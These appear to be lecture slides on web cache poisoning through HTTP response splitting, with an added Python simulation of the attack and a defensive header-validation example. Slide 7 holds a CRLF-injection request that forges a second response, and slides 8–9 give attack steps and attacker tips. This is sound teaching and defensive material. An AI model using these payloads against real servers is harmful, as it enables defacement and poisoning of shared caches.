3. About Web Cache poisoning
Domain pioneered by Amit Klein, formerly Director of Security and Research at Sanctum, Inc.
Allows an attacker to place malicious content on a shared cache server (such as a proxy server).
All users of that cache will continue to receive the malicious content until the cache entry is purged.
Software Security, FCS Iasi, 2013-2014
4. Related attacks & vulnerabilities
Web Cache poisoning is based on HTTP Response Splitting. The attacker must find a web resource vulnerable to HTTP Response Splitting and exploit that vulnerability.
Cross-User Defacement is also possible: placing malicious web content for a specific user and stealing sensitive information.
5. HTTP Response Splitting
Forcing an originator of HTTP messages to emit 2 (or more) valid (RFC-compliant) messages instead of one.
The result of the application's failure to reject illegal user input (malicious/unexpected CR and LF characters, found especially in the Location and Set-Cookie headers).
7. Example – continued [5]
Attack request:
http://www.the.site/welcome.jsp?lang=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>

Response (actually, 2 responses and some change):

Will be interpreted as Response #1:
HTTP/1.0 302 Redirect
Location: http://www.the.site/by_lang.jsp?lang=Foo
Connection: Keep-Alive
Content-Length: 0

Will be interpreted as Response #2 (!!Injected by attacker!!):
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 20
<html>Gotcha!</html>

Superfluous data, does not conform to the HTTP Standard:
Connection: Keep-Alive
Content-Length: 0 …
8. Cache Poisoning Attack
Difficult to carry out in a real environment (many conditions and prerequisites):
1) Find a web resource vulnerable to HTTP Response Splitting.
2) Force the cache server to flush the current cache content (Pragma: no-cache or Cache-Control header).
3) Send a specially crafted request, as in the previous example.
4) Send the next request (for the resource to be poisoned). The injected Response #2 from step 3 will be taken as the response to this request and stored by the shared web cache server.
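The sequence on slides 5, 7 and 8 can be reproduced offline. The following is an added simulation, not code from the lecture or from Klein's papers: a minimal origin with the CRLF-injectable redirect of slide 7, a proxy-style reader that pulls successive HTTP messages off one keep-alive connection, and a shared cache keyed by URL. The payload is the slide-7 one with its line terminators written consistently as CRLF and the HTML angle brackets percent-encoded; the host, the origin's behaviour and the target resource /index.html are constructed assumptions.

```python
"""Simulation of HTTP response splitting leading to shared-cache poisoning.

Added illustration (not code from the lecture): origin, proxy reader and
cache are constructed stand-ins; the attack path is the slide-7 payload.
"""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

CRLF = "\r\n"


def origin_response(request_line: str) -> str:
    """Origin server. welcome.jsp copies `lang` into Location without
    rejecting CR/LF, which is exactly the defect slide 5 describes."""
    path = request_line.split(" ")[1]
    parts = urlsplit(path)
    if parts.path == "/welcome.jsp":
        # parse_qs percent-decodes, so %0d%0a in the query becomes a real CRLF
        lang = parse_qs(parts.query, keep_blank_values=True).get("lang", [""])[0]
        return (
            "HTTP/1.0 302 Redirect" + CRLF
            + "Location: http://www.the.site/by_lang.jsp?lang=" + lang + CRLF
            + "Connection: Keep-Alive" + CRLF
            + "Content-Length: 0" + CRLF + CRLF
        )
    body = "<html>Welcome</html>"  # constructed legitimate content of every other resource
    return (
        "HTTP/1.0 200 OK" + CRLF
        + "Content-Type: text/html" + CRLF
        + "Content-Length: " + str(len(body)) + CRLF + CRLF
        + body
    )


def read_messages(stream: str, limit: Optional[int] = None) -> list:
    """Proxy-style reader: a message is a status line plus headers up to the
    first blank line, followed by Content-Length body bytes. Whatever the
    origin thinks it sent, this is what the proxy sees."""
    messages = []
    pos = 0
    while pos < len(stream) and (limit is None or len(messages) < limit):
        hdr_end = stream.find(CRLF + CRLF, pos)
        if hdr_end < 0:
            break
        lines = stream[pos:hdr_end].split(CRLF)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = hdr_end + len(CRLF + CRLF)
        messages.append({
            "status": lines[0],
            "headers": headers,
            "body": stream[body_start:body_start + length],
        })
        pos = body_start + length
    return messages


# Slide-7 payload, line terminators normalised to CRLF, angle brackets encoded.
ATTACK_PATH = (
    "/welcome.jsp?lang=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200"
    "%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2020%0d%0a%0d%0a%3Chtml%3EGotcha!%3C/html%3E"
)
TARGET_PATH = "/index.html"  # constructed: the resource whose cache entry gets poisoned


def poison_shared_cache() -> dict:
    """Steps 3 and 4 of slide 8: the proxy forwards the crafted request and
    the request for the target resource on one connection, pairs the messages
    it reads with the requests in order, and caches each by URL."""
    requests = [f"GET {ATTACK_PATH} HTTP/1.0", f"GET {TARGET_PATH} HTTP/1.0"]
    stream = "".join(origin_response(r) for r in requests)
    cache = {}
    for req, msg in zip(requests, read_messages(stream, limit=len(requests))):
        cache[req.split(" ")[1]] = msg
    return cache


if __name__ == "__main__":
    cache = poison_shared_cache()
    entry = cache[TARGET_PATH]
    print("cached for", TARGET_PATH, "->", entry["status"], entry["body"])
```

Reading the whole stream with `read_messages(stream)` (no limit) yields four messages: the two the proxy pairs with its requests, the empty-status fragment that is the slide's "superfluous data", and only then the origin's real answer for /index.html. The cache never sees that real answer, which is why step 2 (evicting the existing copy first) matters to the attack and why a proxy that does not share one upstream connection between clients is not exposed in this way.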
9. Attacker - Practical Aspects [4]
Maintain the poisoned resource: Last-Modified header with a future time value; send the cache poisoning attack every x minutes?
Execute all requests immediately one after another.
Take into account the URI length (GET / POST).
The attack scenario depends on the web server implementation (Microsoft ASP, Jakarta Tomcat, IBM WebSphere etc.): where does the second message start?
10. Victims – Practical Aspects [4]
Web application developers: VALIDATE INPUT!! Remove CRs and LFs before embedding data into HTTP response headers (Location and Set-Cookie especially).
Web application engine vendors: disallow CR and LF characters in all HTTP response headers (a requirement of RFC 2616).
Proxy vendors: avoid sharing a server TCP connection among different clients / virtual hosts.
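The developer-level and engine-level advice above, as an added example that is not code from the lecture. The function names are our own; the host and path come from the slide-7 example, and the decoded payload is constructed here for the checks. The proxy-vendor point (no shared upstream connections) is a deployment property and is not shown.

```python
"""Header-injection defences from slide 10, added illustration.

strip_crlf is the developer mitigation as stated on the slide;
validate_header_value is the engine-level backstop; redirect_response is the
hardened form of the slide-7 redirect. All names are our own.
"""
import re
from urllib.parse import quote

CRLF = "\r\n"

# RFC 7230 field-value characters: HTAB, visible ASCII and obs-text.
# CR, LF and every other control character are excluded.
_FIELD_VALUE = re.compile(r"[\t\x20-\x7e\x80-\xff]*")

# Decoded form of the slide-7 payload (constructed for the checks below).
ATTACK_LANG = (
    "Foo\r\nConnection: Keep-Alive\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nContent-Length: 20\r\n\r\n"
    "<html>Gotcha!</html>"
)


def strip_crlf(value: str) -> str:
    """Slide 10, developers: remove CRs and LFs before the value is embedded
    in a header. Silent stripping keeps the rest of the injected text."""
    return value.replace("\r", "").replace("\n", "")


def is_legal_header_value(value: str) -> bool:
    """True when every character is allowed in an HTTP field-value."""
    return _FIELD_VALUE.fullmatch(value) is not None


def validate_header_value(value: str) -> str:
    """Slide 10, engine vendors: refuse any header value that could end the
    header line, so no application code can emit a second message."""
    if not is_legal_header_value(value):
        raise ValueError("illegal character in HTTP header value")
    return value


def redirect_response(lang: str) -> str:
    """Hardened slide-7 redirect: percent-encode the parameter because it is
    embedded in a URL, then run the finished header through the engine check."""
    location = "http://www.the.site/by_lang.jsp?lang=" + quote(lang, safe="")
    return (
        "HTTP/1.0 302 Redirect" + CRLF
        + "Location: " + validate_header_value(location) + CRLF
        + "Content-Length: 0" + CRLF + CRLF
    )


def header_terminators(raw: str) -> int:
    """One response has exactly one blank line; a split response has more."""
    return raw.count(CRLF + CRLF)


if __name__ == "__main__":
    print(redirect_response(ATTACK_LANG))
    print("stripped:", repr(strip_crlf(ATTACK_LANG)))
    print("engine check accepts payload:", is_legal_header_value(ATTACK_LANG))
```

Encoding the value for the context it lands in (here a URL query, so `quote`) is the fix that preserves the data; stripping CR/LF is the minimum the slide asks for; the engine-level check is the layer that holds when an application forgets both, and rejecting is preferable to rewriting because nothing about the caller's intent has to be guessed.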
11. Bibliography
1) OWASP page for Web cache poisoning, https://www.owasp.org/index.php/Cache_Poisoning
2) OWASP page for HTTP Response Splitting, https://www.owasp.org/index.php/HTTP_Response_Splitting
3) OWASP Testing Guide v3 (section 4.8.15, Testing for HTTP Splitting/Smuggling, pages 278-281)
4) Amit Klein, HTTP Response Splitting, Web Cache Poisoning Attacks a
5) Amit Klein, HTTP Message Splitting, Smuggling and Other Animals, OWASP AppSec Europe, 2006
6) China's Great Firewall spreads overseas, http://www.computerworld.com/s/article/9174132/China_s_Great_Firewall_spreads_overseas